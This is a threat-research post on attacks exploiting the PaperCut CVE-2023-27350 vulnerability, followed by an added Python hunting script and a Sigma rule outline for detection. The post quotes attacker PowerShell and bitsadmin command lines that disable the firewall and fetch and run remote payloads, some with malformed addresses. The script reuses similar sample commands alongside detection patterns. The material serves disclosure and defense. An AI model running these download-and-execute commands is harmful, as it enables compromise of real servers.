Last updated 08:45:00: Added “Timeline and Further Sophos Resources” section

Sophos X-Ops MDR and SophosLabs teams have been monitoring and researching activity around the PaperCut vulnerability CVE-2023-27350 since April 13, 2023. In this post we outline our observations on the threat environment around this vulnerability.

On April 19, 2023, software company PaperCut published an update to their advisory indicating that exploitation of CVE-2023-27350 had been reported in the wild. PaperCut offers multi-platform print management software, popular in the education sector. The vulnerability leveraged in the attacks had in fact already been addressed by a patch released the month prior, a situation commonly called an n-day attack.

This vulnerability affects PaperCut MF and NG Application and Site Servers version 8.0 and above across all supported operating systems. A patch was made available on March 8, and Sophos recommends that you apply it at the earliest opportunity on all vulnerable servers. Because exploitation began before the public disclosure, patching closes the entry point but does not remove tooling an attacker has already deployed; servers that were exposed before patching should also be checked for the post-exploitation activity described below.

Sophos’ earliest observation of an affected user occurred on April 13. That attack was identified by a SophosLabs threat researcher when Cobalt Strike was detected during post-exploitation activity. On April 17, four days later and two days before the public announcement, Sophos MDR detected exploitation of a vulnerable PaperCut server at a customer in North America. We quickly contained the affected server and engaged the customer to proceed with remediation. To date, we have observed multiple threat groups targeting potential victims globally, with a disproportionate share in the education sector.

The vulnerability details provided by Trend Micro’s ZDI indicate that the code allowing authentication bypass and remote code execution is found in the SetupCompleted Java class. At the time of exploitation, Sophos MDR observed the following error log being generated:

Figure 1: Error messages are an early sign that something is amiss

Post-exploitation activity often results in PowerShell commands being executed with pc-app.exe (the PaperCut application server process) as the parent, as seen in Figure 2 downloading Atera remote monitoring software to the victim.

Figure 2: PowerShell download of legitimate-but-abused Atera software

(Atera is of course legitimate software, seen in this situation being abused by the attackers.)

This is just one example observed, as different threat groups execute PowerShell in a variety of ways:

Powershell $url=" $dst="C:\encexe" netsh advfirewall set allprofiles state off Invoke-WebRequest $url -OutFile $dst Start-Process $dst -windowstyle hidden Start-Sleep -s 10

powershell IEX ((New-Object Net.WebClient).DownloadString ('77:443/for.ps1'))

Sophos MDR has also observed the use of BITSAdmin, a commonly abused LOLBin (a legitimate, signed Windows binary repurposed by attackers), to download additional tools:

bitsadmin /transfer dwa /download /priority FOREGROUND http//23.184.4817/bootcamp.zip C:\ProgramData\bootcamp.zip

bitsadmin /transfer mydownloadjob /download /priority normal http//192.184.35216:443/4591187629.exe %WINDIR%setup2.exe

The tools abused in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of AnyDesk, Atera, Synchro, TightVNC, NetSupport, and DWAgent remote management tools across multiple campaigns.

Additionally, some of the final payloads overlap with previously reported threats such as Truebot (downloader, often linked to Cl0p ransomware), Buhti (ransomware), MoneroOcean (coinminer), and Mirai (botnet). One such example of a miner, shown in Figure 3, details the commands used to kill competing miners before launching the attackers’ own Monero (XMR) mining software.

Figure 3: Miner-on-miner violence

Determining impact with Sophos XDR

Upon receiving updated threat intelligence, Sophos MDR threat hunters immediately started searching across our customer base for any additional affected users. The following SQL query can be used by Sophos XDR customers in their Sophos Central console to identify any suspicious activity, and can also be converted into a Sigma rule for non-Sophos customers.
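The PowerShell and BITSAdmin command lines shown above and the XDR hunting query this section refers to are two views of the same detection problem: LOLBins launched under the PaperCut service process, and download cradles or firewall tampering on a print server. The block below is an added example written for this page; it is not Sophos’s XDR query and not code from the post. It loads constructed process events into an in-memory SQLite table (the column names are an assumption about what an EDR exposes, and the addresses are RFC 5737 documentation ranges rather than indicators from the post), runs a query shaped like that hunt, and then pulls the remote URLs out of the hits for blocking or pivoting.

```python
"""Hunt for PaperCut (CVE-2023-27350) post-exploitation patterns in process events.

Added example, not Sophos's XDR query. Events are loaded into an in-memory
SQLite table whose column names are an assumption about what an EDR exposes.
"""
import re
import sqlite3

# Children of pc-app.exe worth flagging. PowerShell and bitsadmin come from the
# post; the other LOLBins are this example's additions.
SUSPICIOUS_CHILDREN = (
    "cmd.exe", "powershell.exe", "pwsh.exe", "bitsadmin.exe", "certutil.exe",
    "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe",
)

# Constructed sample events: (hostname, parent_name, process_name, cmdline).
# Addresses are RFC 5737 documentation ranges, not indicators from the post.
SAMPLE_EVENTS = [
    ("print-srv-01", "pc-app.exe", "cmd.exe",
     "cmd.exe /c powershell IEX ((New-Object Net.WebClient)"
     ".DownloadString('http://198.51.100.7:443/for.ps1'))"),
    ("print-srv-01", "pc-app.exe", "powershell.exe",
     'powershell $url="http://203.0.113.9/enc.exe"; $dst="C:\\enc.exe"; '
     "netsh advfirewall set allprofiles state off; "
     "Invoke-WebRequest $url -OutFile $dst; Start-Process $dst -windowstyle hidden"),
    ("print-srv-02", "cmd.exe", "bitsadmin.exe",
     "bitsadmin /transfer dwa /download /priority FOREGROUND "
     "http://203.0.113.9/bootcamp.zip C:\\ProgramData\\bootcamp.zip"),
    # Controls: a non-LOLBin child of the service, and admin PowerShell elsewhere.
    ("print-srv-01", "pc-app.exe", "conhost.exe", "conhost.exe 0x4"),
    ("ws-hr-14", "explorer.exe", "powershell.exe", "powershell Get-Date"),
]

# Two independent conditions: (1) the PaperCut service spawned a LOLBin, the
# parent/child relationship the post highlights; (2) a download cradle or the
# firewall-off command under any parent, since later stages run elsewhere.
HUNT_QUERY = """
SELECT hostname, parent_name, process_name, cmdline,
       CASE WHEN lower(parent_name) = 'pc-app.exe'
                 AND lower(process_name) IN ({children})
            THEN 'lolbin spawned by PaperCut service'
            ELSE 'download cradle or firewall disabled' END AS reason
FROM process_events
WHERE (lower(parent_name) = 'pc-app.exe' AND lower(process_name) IN ({children}))
   OR lower(cmdline) LIKE '%downloadstring%'
   OR lower(cmdline) LIKE '%invoke-webrequest%'
   OR lower(cmdline) LIKE '%bitsadmin%/transfer%'
   OR lower(cmdline) LIKE '%advfirewall set allprofiles state off%'
ORDER BY hostname, process_name
"""

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def hunt(events=SAMPLE_EVENTS):
    """Load events into SQLite, run the hunt, and return flagged rows as dicts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE process_events "
                "(hostname TEXT, parent_name TEXT, process_name TEXT, cmdline TEXT)")
    con.executemany("INSERT INTO process_events VALUES (?, ?, ?, ?)", events)
    placeholders = ",".join("?" * len(SUSPICIOUS_CHILDREN))
    query = HUNT_QUERY.format(children=placeholders)
    # Placeholders bind positionally: the CASE list first, then the WHERE list.
    rows = con.execute(query, SUSPICIOUS_CHILDREN * 2).fetchall()
    con.close()
    columns = ("hostname", "parent_name", "process_name", "cmdline", "reason")
    return [dict(zip(columns, row)) for row in rows]


def extract_urls(findings):
    """Collect remote URLs from flagged command lines, for blocking or pivoting."""
    urls = set()
    for finding in findings:
        urls.update(URL_RE.findall(finding["cmdline"]))
    return sorted(urls)


if __name__ == "__main__":
    hits = hunt()
    for hit in hits:
        print(f"{hit['hostname']}: {hit['parent_name']} -> "
              f"{hit['process_name']} [{hit['reason']}]")
    print("URLs to block:", extract_urls(hits))
```

The same two conditions map directly onto a Sigma process_creation rule: one selection on a ParentImage ending in \pc-app.exe with Image in the LOLBin list, OR'd with CommandLine contains patterns for DownloadString, Invoke-WebRequest, bitsadmin /transfer and the advfirewall state-off string. Expect benign hits from administrators running PowerShell on the server; the parent-process condition is the high-confidence signal, and the command-line patterns are the broader net that needs triage.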